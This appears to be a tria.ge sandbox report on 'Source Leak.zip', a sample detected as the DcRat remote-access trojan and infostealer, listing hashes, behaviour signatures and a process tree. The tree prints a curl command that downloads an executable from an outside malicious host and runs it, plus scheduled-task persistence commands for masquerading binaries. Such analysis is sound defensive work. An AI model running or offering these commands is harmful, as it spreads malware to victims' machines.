Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

Source Leak.zip

windows7-x64

1

Source Leak.zip

windows10-2004-x64

10

Source Lea...dup.js

windows7-x64

3

Source Lea...dup.js

windows10-2004-x64

3

Analysis

  • max time kernel
    43s
  • max time network
    42s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/01/2025, 18:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Source Leak.zip

  • Size

    39.6MB

  • MD5

    e64b8344b70fecd613395cdf888698ae

  • SHA1

    543c6c5297febf627a28be183adfb500012bb00a

  • SHA256

    b878bfc5791ec1039c16b2e81e465fe511e04619f1952f1b34c4d5a28d3eb60d

  • SHA512

    3b65d816dbd64aeef3d8627c6b22239adfd21a91bbfa327d76e48057d0a8503cda0bf9dd946ddaab389f5d078f68292970c0447c0dd1c3c9ab0fafad50e7bfff

  • SSDEEP

    786432:Q8f8EgLU6Dc11xD8ZEs69KZZg2pK0BWvcErSde6No8Xpt:Q8EEggPBW8AgeKagcmSrNF

Score
10/10
dcratdiscoveryinfostealerrat

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

    ratinfostealerdcrat
  • Dcrat family
    dcrat
  • Process spawned unexpected child process 13 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Downloads MZ/PE file 1 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry class 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 13 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 53 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Source Leak.zip"
    1⤵
    • Modifies registry class
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:3520
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:3292
    • C:\Users\Admin\Desktop\Source Leak\Release\Source.exe
      "C:\Users\Admin\Desktop\Source Leak\Release\Source.exe"
      1⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4224
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c cls
        2⤵
          PID:4048
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c cls
          2⤵
            PID:2540
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c curl --silent https://cdn1337.site/builded.txt --output C:\Windows\Speech\physmeme.exe
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:4640
            • C:\Windows\system32\curl.exe
              curl --silent https://cdn1337.site/builded.txt --output C:\Windows\Speech\physmeme.exe
              3⤵
              • Downloads MZ/PE file
              • Drops file in Windows directory
              PID:2968
          • C:\Windows\Speech\physmeme.exe
            "C:\Windows\Speech\physmeme.exe"
            2⤵
            • Checks computer location settings
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Modifies registry class
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:4452
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\ESD\jZRzGmZ0nmWlIW7eyKvICIC2GnKeW02cdUcmyP.vbe"
              3⤵
              • Checks computer location settings
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1432
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\ESD\EOO029hu24.bat" "
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3524
                • C:\ESD\Winver.exe
                  "C:\ESD/Winver.exe"
                  5⤵
                  • Executes dropped EXE
                  • Drops file in Program Files directory
                  • Drops file in Windows directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4128
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\Links\RuntimeBroker.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Scheduled Task/Job: Scheduled Task
          PID:1636
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Admin\Links\RuntimeBroker.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Scheduled Task/Job: Scheduled Task
          PID:3188
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\Links\RuntimeBroker.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Scheduled Task/Job: Scheduled Task
          PID:1236
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\OneDrive\conhost.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Scheduled Task/Job: Scheduled Task
          PID:3760
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Admin\OneDrive\conhost.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Scheduled Task/Job: Scheduled Task
          PID:3492
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\OneDrive\conhost.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Scheduled Task/Job: Scheduled Task
          PID:2332
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\ESD\dllhost.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Scheduled Task/Job: Scheduled Task
          PID:3364
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\ESD\dllhost.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Scheduled Task/Job: Scheduled Task
          PID:3896
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\ESD\dllhost.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Scheduled Task/Job: Scheduled Task
          PID:2204
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Sidebar\lsass.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Scheduled Task/Job: Scheduled Task
          PID:2776
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Sidebar\lsass.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Scheduled Task/Job: Scheduled Task
          PID:2592
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Sidebar\lsass.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Scheduled Task/Job: Scheduled Task
          PID:4928
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\wininit.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Scheduled Task/Job: Scheduled Task
          PID:4572

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ESD\EOO029hu24.bat
          Filesize

          61B

          MD5

          33c54a5f80394595d7f9f5bf2374f68c

          SHA1

          e515abb832132011a48661843ca2cb85ac7b7296

          SHA256

          97ec10319ebe1f05ac4f58bf8619aad0e0af8bcb0f11e8f44a73cd80fc125d2d

          SHA512

          8203808771aac07a702e986204fef3a3c5eb869f4863423b86b8fbb449f5a17700c459e96ec06958bdc17c48825380592aed90a93444e6d30027f3c1002e67bc

          Download Submit

        • C:\ESD\Winver.exe
          Filesize

          1.8MB

          MD5

          b5c4fa68d74ab47092a46241d6b10a16

          SHA1

          e754f10c51933c1ef98782fbf695e8f21198fe7e

          SHA256

          20e9dafaa42a6b6122ecc150622cf8aabe7a324527df144561de5ba0b486ab2a

          SHA512

          3ab67cb936cab9eb89bb8275309cbc5f56d7f03e554b5cc7bd54305c282b6e8a0feb4af8c1ebc7073d63c371444751c522b030748b4d57c28a768fd6cfdb5293

          Download Submit

        • C:\ESD\jZRzGmZ0nmWlIW7eyKvICIC2GnKeW02cdUcmyP.vbe
          Filesize

          202B

          MD5

          4652fb55e060252dacdca19aee6266b0

          SHA1

          7711f923873149629b869217eea3b9e7b53a37d2

          SHA256

          071d6610f34bb0b1e2f6077550a40faf08475865b2863f3340f44f82fc009c74

          SHA512

          2f73b677f27eb83ec54ecf6c75701e01ae69c8173ea6e081aed443ec19e6f8326de0a4dcb3c808c321f74f1c1916e5a2ecaffed0774fe29ba3889e593bb1515c

          Download Submit

        • C:\Users\Admin\Desktop\Source Leak\Release\Source.exe
          Filesize

          1.2MB

          MD5

          6179f45e49ae7257c1fb5859dc119f73

          SHA1

          14b8a63e92e4d9254a3949f841631b96f5eaa590

          SHA256

          7dc826deb7225c544091b7a33f6e9093617941d90fba7c5b5057ff97e231270f

          SHA512

          6f492fa5a1c7ba28c269355f80e316db05186ffd9ed28c72b1ce911cb8f46a10049fcfd09008ee99996194f4d154eb46e8b7af98c31db98a4a3690397a46b519

          Download Submit

        • C:\Windows\Speech\physmeme.exe
          Filesize

          2.1MB

          MD5

          1d6941fbe47aa24e563eaad080f6d13a

          SHA1

          438d9a13439a4bd5939f0dc7d5a8a252e802236a

          SHA256

          ca3ef84162bcbf7d8ba6fbe39ab1b64ac743291c967005ac739f8e6baee91e32

          SHA512

          c3949ebd681c06ea0b62790d517ace9ae1531acb5bf9d05a766ac575599a17bdaeda889f599092b61fb34312bcbd5d8cda0193f89a2627af2019b27302b70f7e

          Download Submit

        • memory/4128-287-0x0000000000940000-0x0000000000B12000-memory.dmp

          Filesize

          1.8MB

          Download

        • memory/4128-289-0x0000000002BF0000-0x0000000002BFE000-memory.dmp

          Filesize

          56KB

          Download

        • memory/4128-291-0x000000001C500000-0x000000001C51C000-memory.dmp

          Filesize

          112KB

          Download

        • memory/4128-292-0x000000001C570000-0x000000001C5C0000-memory.dmp

          Filesize

          320KB

          Download

        • memory/4128-294-0x000000001C520000-0x000000001C538000-memory.dmp

          Filesize

          96KB

          Download